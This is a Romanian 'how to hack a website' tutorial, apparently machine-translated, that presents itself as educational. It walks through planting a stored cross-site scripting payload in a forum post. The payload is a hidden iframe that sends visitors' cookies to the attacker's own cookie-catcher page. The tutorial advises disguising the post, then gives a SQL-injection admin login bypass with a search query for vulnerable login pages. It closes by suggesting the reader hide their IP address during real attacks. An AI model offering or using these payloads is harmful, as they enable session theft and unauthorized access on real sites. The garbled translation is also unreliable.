gtemata.com

Cum de a încălca un site web

Fiți atenți: Acest articol "Cum să" este scris numai în scopuri educaționale, pentru a apropia oamenii de cunoștințelehacking whitehat

, adică tehnici de a încălca un site într-o manieră legală sau pentru a vedea cum lucrează hackerii, pentru a-și proteja mai bine site-urile. Acest tutorial vă va oferi instrucțiuni despre cum să accesați mai multe site-uri web care oferă protecție redusă.

paşi

Metoda 1
Utilizați Scripting Cross Site (XSS)

Imagine intitulată Hack a Website Step 1
1
Găsiți un site vulnerabil în care puteți publica conținut. Un buletin de bord este un bun exemplu. Rețineți că dacă site-ul este sigur, atunci această metodă nu va funcționa.
  • Imagine intitulată Hack a Website Step 2
    2
    Du-te pentru a crea o postare. Va trebui să tastați un cod special în "post" care va capta datele tuturor celor care fac clic pe el.
  • Vă sfătuim să verificați dacă sistemul filtrează codul. Publicați alerta ("test") (dar eliminați citatele). Dacă apare o fereastră de avertizare care face clic pe postarea dvs., site-ul este vulnerabil la atac.
  • Imagine intitulată Hack a Website Step 3
    3
    Creați și încărcați-vă pe dvs. cookie captcher. Scopul acestui atac este de a capta cookie-urile unui utilizator, care permite accesul la contul său pe site-urile web cu acces vulnerabil. Veți avea nevoie de un cookie de captură, care captează cookie-urile țintă și le redirecționează. Încărcați catcherul pe un site pe care îl puteți accesa și susține limba php. Un exemplu de astfel de cod poate fi găsit în secțiunea de exemplu.
  • Imagine intitulată Hack a Website Step 4
    4
    Publicați cu cookie-ul de captură. Introduceți un cod corect în postarea care va captura cookie-urile și le va trimite pe site-ul dvs. Va fi mai bine să adăugați un text după cod pentru a reduce suspiciunea și pentru a împiedica ștergerea postării.
  • Un exemplu de cod ar putea fi următorul: <... iframe ... frameborder = 0 înălțime = 0 lățime = 0 src = jаvascript ...: void (document.location ="YourURL / cookiecatcher.php? C ="+ Document.cookie) >< ... / iframe > (dar trebuie să eliminați toate punctele).
  • Imaginea intitulată Hack a Website Step 5
    5
    Utilizați modulele cookie pe care le-ați colectat. După aceasta, veți putea utiliza informațiile cookie-urilor, care vor fi salvate pe site-ul dvs., în orice scop care ar putea fi necesar.
  • Metoda 2
    Efectuați atacuri de tip Injecție

    Imagine intitulată Hack a Website Step 6
    1
    Găsiți un site vulnerabil. Trebuie să găsești un site care este vulnerabil, din cauza unui defect în autentificarea administratorului care este ușor accesibilă. Încercați să căutați pe Google "login.asp admin".
  • Imaginea intitulată Hack a Website Step 7
    2
    Conectați-vă ca administrator. Introduceți adminul ca nume de utilizator și utilizați unul dintre numeroasele șiruri de parole diferite. Poate fi un număr de șiruri diferite, dar este un exemplu comun 1 `OR` 1 `=` 1.
  • Imaginea intitulată Hack a Website Step 8


    3
    Fii răbdător. Acest proces va necesita probabil un pic de încercare și eroare.
  • Imaginea intitulată Hack a Website Step 9
    4
    Accesați site-ul Web. În cele din urmă, ar trebui să găsiți un șir care permite accesul administratorului la un site web, presupunând că este vulnerabil la atac.
  • Metoda 3
    Pregătește-te pentru succes

    Imaginea intitulată Hack a Website Step 10
    1
    Aflați un limbaj de programare sau două. Dacă doriți cu adevărat să învățați cum să hackați site-urile web, trebuie să înțelegeți cum funcționează computerele și alte tehnologii. Învață să utilizezi limbi de programare precum Python sau SQL, pentru a avea cel mai bun control posibil al computerului și pentru a identifica vulnerabilitățile din sisteme.
  • Imaginea intitulată Hack a Website Step 11
    2
    Trebuie să cunoașteți bazele HTML. În special, ar fi mai bine să aveți o înțelegere deplină a interacțiunii dintre codul HTML și jаvascript dacă doriți să puteți rupe anumite site-uri web. Îți va lua mult timp să înveți, dar pe net poți găsi multe resurse, chiar și gratuite, deci dacă vrei să profiți de ea, cu siguranță vei avea ocazia să o faci.
  • Imaginea intitulată Hack a Website Step 12
    3
    Vedeți: hackerii folosesc capabilitățile lor în scopuri caritabile, descoperind vulnerabilități de securitate și făcând Internetul un loc mai bun pentru toată lumea. Dacă doriți să învățați tehnicile de hacking și să vă folosiți cunoștințele în scopuri benefice sau să vă protejați site-ul, vă recomandăm să consultați niște persoane care sunt în afaceri pentru a obține sfaturi utile.
  • Imaginea intitulată Hack a Website Step 13
    4
    Cercetare hacking. Indiferent dacă doriți să aflați cum să fiți un hacker sau doar doriți să vă protejați, va trebui să faceți o mulțime de cercetări. Site-urile web pot fi vulnerabile în aspecte foarte diferite, lista cărora se schimbă în mod constant, deci trebuie să studiezi în mod constant.
  • Imaginea intitulată Hack a Website Step 14
    5
    Păstrați actualizări. Pe măsură ce lista de vulnerabilități posibile este în continuă schimbare, va trebui să fiți la curent. Doar pentru că acum sunteți protejat de un anumit tip de hack, nu înseamnă că veți fi în siguranță în viitor!
  • Sfaturi

    • Participați la forumuri hacker pentru a obține o mulțime de sfaturi utile.

    Avertismente

    • A face hacking-ul ilegal. Dacă poliția te găsește, e vina ta.
    • Dacă încercați să încercați hacking în lumea reală, camuflați adresa IP utilizând software-ul disponibil online.
    • Dacă citiți acest articol, nu veți deveni imediat un hacker. TREBUIE să vă cultivați abilitățile și să faceți o mulțime de exerciții fizice.
    Distribuiți pe rețelele sociale:

    înrudit